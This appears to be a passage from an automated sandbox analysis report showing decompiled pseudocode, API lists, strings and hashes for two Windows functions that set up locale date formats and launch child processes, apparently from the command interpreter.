Download Yara Rule

C-Code - Quality: 92%

			E00343F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t33 ^ _t138;
				_t136 = E003441A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x35f81c, 8) == 0) {
					_t93 = 0x35f81c;
					_t107 = 8;
					_t118 = ":" - 0x35f81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x35d540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x35d540 = 1;
								 *0x35f7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x35d540 = 2;
									 *0x35f7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x35d540 = _t86;
							 *0x35f7f8 = L"MM/dd/yy";
						}
					}
					 *0x35f620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x35f620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x35f80c, 8) == 0) {
						_t94 = 0x35f80c;
						_t108 = 8;
						_t120 = "/" - 0x35f80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x35f7a8, 0x20) == 0) {
							_t95 = 0x35f7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x35f7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x35f768, 0x20) == 0) {
							_t96 = 0x35f768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x35f768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x35f728, 0x20) == 0) {
							_t97 = 0x35f728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x35f728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x35f6e8, 0x20) == 0) {
							_t98 = 0x35f6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x35f6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x35f6a8, 0x20) == 0) {
							_t99 = 0x35f6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x35f6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x35f668, 0x20) == 0) {
							_t100 = 0x35f668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x35f668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x35f628, 0x20) == 0) {
							_t101 = 0x35f628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x35f628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x35f7fc, 8) == 0) {
							_t102 = 0x35f7fc;
							_t116 = 8;
							_t134 = "." - 0x35f7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x35f7e8, 8) == 0) {
							_t103 = 0x35f7e8;
							_t116 = 8;
							_t136 = "," - 0x35f7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E00346FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x35d0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

0x00343f8b
0x00343f92
0x00343fa3
0x00343fb0
0x0034e1fa
0x0034e204
0x0034e209
0x0034e20b
0x0034e20b
0x0034e213
0x00000000
0x00000000
0x0034e215
0x0034e21c
0x00000000
0x00000000
0x0034e21e
0x0034e221
0x0034e224
0x0034e227
0x00000000
0x00000000
0x0034e22f
0x0034e22f
0x0034e232
0x0034e234
0x00000000
0x0034e234
0x0034e22d
0x00000000
0x00000000
0x00000000
0x0034e22d
0x00343fb6
0x00343fcd
0x00344011
0x0034401c
0x00344032
0x0034403b
0x0034403e
0x0034e23c
0x0034e23f
0x0034e263
0x0034e26d
0x0034e241
0x0034e244
0x0034e24a
0x0034e254
0x0034e254
0x0034e244
0x00344044
0x00344044
0x00344049
0x00344049
0x0034403e
0x0034405e
0x00344074
0x00344080
0x00344080
0x0034409c
0x0034e27c
0x0034e286
0x0034e28b
0x0034e28d
0x0034e28d
0x0034e295
0x00000000
0x00000000
0x0034e297
0x0034e29e
0x00000000
0x00000000
0x0034e2a0
0x0034e2a3
0x0034e2a6
0x0034e2a9
0x00000000
0x00000000
0x0034e2b1
0x0034e2b1
0x0034e2b4
0x0034e2b6
0x00000000
0x0034e2b6
0x0034e2af
0x00000000
0x00000000
0x00000000
0x003440a2
0x003440a2
0x003440b4
0x0034e2be
0x0034e2c8
0x0034e2cd
0x0034e2cf
0x0034e2cf
0x0034e2d7
0x00000000
0x00000000
0x0034e2d9
0x0034e2e0
0x00000000
0x00000000
0x0034e2e2
0x0034e2e5
0x0034e2e8
0x0034e2eb
0x00000000
0x00000000
0x0034e2f3
0x0034e2f3
0x0034e2f6
0x0034e2f8
0x00000000
0x0034e2f8
0x0034e2f1
0x00000000
0x00000000
0x00000000
0x0034e2f1
0x003440ba
0x003440cc
0x0034e300
0x0034e30a
0x0034e30f
0x0034e311
0x0034e311
0x0034e319
0x00000000
0x00000000
0x0034e31b
0x0034e322
0x00000000
0x00000000
0x0034e324
0x0034e327
0x0034e32a
0x0034e32d
0x00000000
0x00000000
0x0034e335
0x0034e335
0x0034e338
0x0034e33a
0x00000000
0x0034e33a
0x0034e333
0x00000000
0x00000000
0x00000000
0x0034e333
0x003440d2
0x003440e4
0x0034e342
0x0034e34c
0x0034e351
0x0034e353
0x0034e353
0x0034e35b
0x00000000
0x00000000
0x0034e35d
0x0034e364
0x00000000
0x00000000
0x0034e366
0x0034e369
0x0034e36c
0x0034e36f
0x00000000
0x00000000
0x0034e377
0x0034e377
0x0034e37a
0x0034e37c
0x00000000
0x0034e37c
0x0034e375
0x00000000
0x00000000
0x00000000
0x0034e375
0x003440ea
0x003440fc
0x0034e384
0x0034e38e
0x0034e393
0x0034e395
0x0034e395
0x0034e39d
0x00000000
0x00000000
0x0034e39f
0x0034e3a6
0x00000000
0x00000000
0x0034e3a8
0x0034e3ab
0x0034e3ae
0x0034e3b1
0x00000000
0x00000000
0x0034e3b9
0x0034e3b9
0x0034e3bc
0x0034e3be
0x00000000
0x0034e3be
0x0034e3b7
0x00000000
0x00000000
0x00000000
0x0034e3b7
0x00344102
0x00344114
0x0034e3c6
0x0034e3d0
0x0034e3d5
0x0034e3d7
0x0034e3d7
0x0034e3df
0x00000000
0x00000000
0x0034e3e1
0x0034e3e8
0x00000000
0x00000000
0x0034e3ea
0x0034e3ed
0x0034e3f0
0x0034e3f3
0x00000000
0x00000000
0x0034e3fb
0x0034e3fb
0x0034e3fe
0x0034e400
0x00000000
0x0034e400
0x0034e3f9
0x00000000
0x00000000
0x00000000
0x0034e3f9
0x0034411a
0x0034412c
0x0034e408
0x0034e412
0x0034e417
0x0034e419
0x0034e419
0x0034e421
0x00000000
0x00000000
0x0034e423
0x0034e42a
0x00000000
0x00000000
0x0034e42c
0x0034e42f
0x0034e432
0x0034e435
0x00000000
0x00000000
0x0034e43d
0x0034e43d
0x0034e440
0x0034e442
0x00000000
0x0034e442
0x0034e43b
0x00000000
0x00000000
0x00000000
0x0034e43b
0x00344132
0x00344144
0x0034e44a
0x0034e454
0x0034e459
0x0034e45b
0x0034e45b
0x0034e463
0x00000000
0x00000000
0x0034e465
0x0034e46c
0x00000000
0x00000000
0x0034e46e
0x0034e471
0x0034e474
0x0034e477
0x00000000
0x00000000
0x0034e47f
0x0034e47f
0x0034e482
0x0034e484
0x00000000
0x0034e484
0x0034e47d
0x00000000
0x00000000
0x00000000
0x0034e47d
0x0034414a
0x0034415c
0x0034e48c
0x0034e496
0x0034e49b
0x0034e49d
0x0034e49d
0x0034e4a5
0x00000000
0x00000000
0x0034e4a7
0x0034e4ae
0x00000000
0x00000000
0x0034e4b0
0x0034e4b3
0x0034e4b6
0x0034e4b9
0x00000000
0x00000000
0x0034e4c1
0x0034e4c1
0x0034e4c4
0x0034e4c6
0x00000000
0x0034e4c6
0x0034e4bf
0x00000000
0x00000000
0x00000000
0x0034e4bf
0x00344162
0x00344174
0x0034e4ce
0x0034e4d8
0x0034e4dd
0x0034e4df
0x0034e4df
0x0034e4e7
0x00000000
0x00000000
0x0034e4e9
0x0034e4f0
0x00000000
0x00000000
0x0034e4f2
0x0034e4f5
0x0034e4f8
0x0034e4fb
0x00000000
0x00000000
0x0034e503
0x0034e503
0x0034e506
0x0034e508
0x00000000
0x0034e508
0x0034e501
0x00000000
0x00000000
0x00000000
0x0034e501
0x0034417a
0x00344181
0x00344199
0x00344199
0x00343fcf
0x00343fcf
0x00343fd4
0x00343fe0
0x00343fe0
0x00343fe6
0x00000000
0x00000000
0x00343fef
0x0034400a
0x0034400a
0x0034400c
0x0034400c
0x00000000
0x0034400c
0x00343ff1
0x00343ff5
0x00343ff9
0x00000000
0x00000000
0x00343fff
0x00344002
0x00344008
0x00000000
0x00000000
0x00000000
0x00344008
0x0034419a
0x0034419c
0x00000000
0x0034419c

APIs

Part of subcall function 003441A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00335BA1,0000001F,?,00000080), ref: 003441A4

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,0035F81C,00000008,00000000,?), ref: 00343FA8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00343FC5
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 0034402A
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 0034406C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0035F80C,00000008), ref: 00344094
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0035F7A8,00000020), ref: 003440AC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0035F768,00000020), ref: 003440C4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0035F728,00000020), ref: 003440DC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0035F6E8,00000020), ref: 003440F4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0035F6A8,00000020), ref: 0034410C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0035F668,00000020), ref: 00344124
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0035F628,00000020), ref: 0034413C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0035F7FC,00000008), ref: 00344154
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0035F7E8,00000008), ref: 0034416C
setlocale.MSVCRT ref: 00344181

Strings

Fri, xrefs: 0034E3CB
Wed, xrefs: 0034E347
MM/dd/yy, xrefs: 00344049
1, xrefs: 00344076
Sat, xrefs: 0034E40D
Tue, xrefs: 0034E305
Mon, xrefs: 0034E2C3
yy/MM/dd, xrefs: 0034E254
Sun, xrefs: 0034E44F
Thu, xrefs: 0034E389
dd/MM/yy, xrefs: 0034E26D
.OCP, xrefs: 0034417A

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 1351325837-478706884
Opcode ID: f0a6e7d54c828ea108a2cd898a306d41fd27f1de8182cebdae5321d0d8c6b23e
Instruction ID: c86fa814adae3e4c7df054acd9eced7afa4b3566d0e919c78c113cb9da5e79eb
Opcode Fuzzy Hash: f0a6e7d54c828ea108a2cd898a306d41fd27f1de8182cebdae5321d0d8c6b23e
Instruction Fuzzy Hash: A5D1F2786003129ADB239F358D08B7632EDFF51745F15826ADA02DF6E4EBB0EA49C350

Uniqueness

Uniqueness Score: -1.00%

Function 0034374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322
threadprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0034374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E003475CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x35bdf8, 0x108);
				if(_t68 == 0) {
					 *0x373cf0 = GetLastError();
					E00355011(_t135);
					L21:
					return E00347614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x373cf0 = GetLastError();
					E00355011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E00343320(L"COPYCMD") == 0) {
					}
					_t90 = E0033DF40(0x3324ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x35d0b4);
						L003482BB();
						L36:
						goto L21;
					}
					if( *0x373ccc == 0) {
						__eflags =  *0x378058;
						if( *0x378058 != 0) {
							goto L6;
						}
						__eflags =  *0x373cc4;
						if( *0x373cc4 == 0) {
							L8:
							E00344C00();
							_t94 =  *0x373cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x373cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x373ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x373cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E00343A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x373cc9;
									if( *0x373cc9 == 0) {
										L48:
										__eflags =  *0x373cf0 - 0x2e4;
										if( *0x373cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E003400B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E00341040(_t177, 0x7fe7, _t135);
												E00355011(_t177);
												E00340040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E00347797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0x373cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x373ab0;
											}
											_t174 =  *0x37c01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x373cf0);
										}
										goto L54;
									}
									__eflags =  *0x373cf0 - 0xc1;
									if( *0x373cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x363838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x35d54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E00343A30();
											goto L21;
										}
										_t109 = E00344C3E();
										 *0x36b8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E0034274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E00343A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E0034274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E00343A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E0035579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x3324f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x373ccc == 0) {
										__eflags =  *0x373cc4;
										if( *0x373cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x373cc9;
										if( *0x373cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x378058;
											if( *0x378058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E003552E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x373cb8;
							if(_t95 == 0) {
								_t95 = 0x373ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E00342349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E00354478();
					}
					goto L8;
				}
			}

0x00343758
0x0034375d
0x00343763
0x00343769
0x0034376c
0x0034376f
0x00343771
0x00343777
0x0034377d
0x00343783
0x00343799
0x003437a0
0x003437a8
0x0034ddec
0x0034ddf3
0x003439e2
0x003439e7
0x003439e7
0x003437b1
0x003437c8
0x003437cf
0x003437d7
0x0034de08
0x0034de0f
0x0034de1b
0x00000000
0x003437dd
0x003437e7
0x003437f5
0x003437fb
0x00343808
0x0034380e
0x00343817
0x0034381f
0x00343820
0x00343826
0x0034382c
0x00343832
0x00343840
0x00343848
0x00343853
0x0034385c
0x00343862
0x00343871
0x00343873
0x0034387a
0x0034387f
0x00343887
0x0034de3e
0x0034de3e
0x0034de43
0x0034de44
0x0034de49
0x0034de51
0x00000000
0x0034de53
0x00343894
0x0034de59
0x0034de60
0x00000000
0x00000000
0x0034de66
0x0034de6d
0x003438bc
0x003438bc
0x003438c1
0x003438c8
0x003439ea
0x003439ed
0x003439ef
0x00000000
0x00000000
0x0034de82
0x0034de87
0x0034de89
0x0034de8b
0x0034de8b
0x0034deae
0x003438fe
0x003438fe
0x00343902
0x0034dec3
0x0034dec9
0x0034decf
0x00343908
0x0034390e
0x0034391a
0x0034391a
0x00343926
0x0034392b
0x00343932
0x0034ded9
0x0034dee0
0x0034deee
0x0034deee
0x0034def8
0x0034df3e
0x0034df3e
0x0034df40
0x00000000
0x00000000
0x0034df50
0x0034df52
0x0034df54
0x0034de2b
0x0034de32
0x0034de39
0x0034de39
0x00000000
0x0034df54
0x0034defa
0x0034defa
0x0034deff
0x0034df01
0x0034df3c
0x0034df03
0x0034df03
0x0034df09
0x0034df0b
0x0034df0d
0x0034df0d
0x0034df38
0x0034df38
0x00000000
0x0034df01
0x0034dee2
0x0034deec
0x00000000
0x00000000
0x00000000
0x00343938
0x00343938
0x00343938
0x00343943
0x00343949
0x0034394a
0x0034394e
0x0034df98
0x0034df9a
0x00343967
0x00343967
0x00343970
0x00343977
0x00343a0c
0x00343a0c
0x00343a0f
0x0034dfbc
0x0034dfc2
0x0034dfc4
0x0034dfcb
0x0034dfd1
0x0034dfd1
0x00343a15
0x00343a15
0x00343a17
0x00343a1f
0x00343a1f
0x00343a17
0x003439d4
0x003439d4
0x003439db
0x00000000
0x003439e0
0x00343983
0x00343988
0x0034398d
0x00343993
0x00343995
0x003439a7
0x003439b7
0x003439bf
0x00343a26
0x00343a29
0x00000000
0x00000000
0x0034dfac
0x0034dfb4
0x003439c6
0x003439cb
0x003439d2
0x00343a49
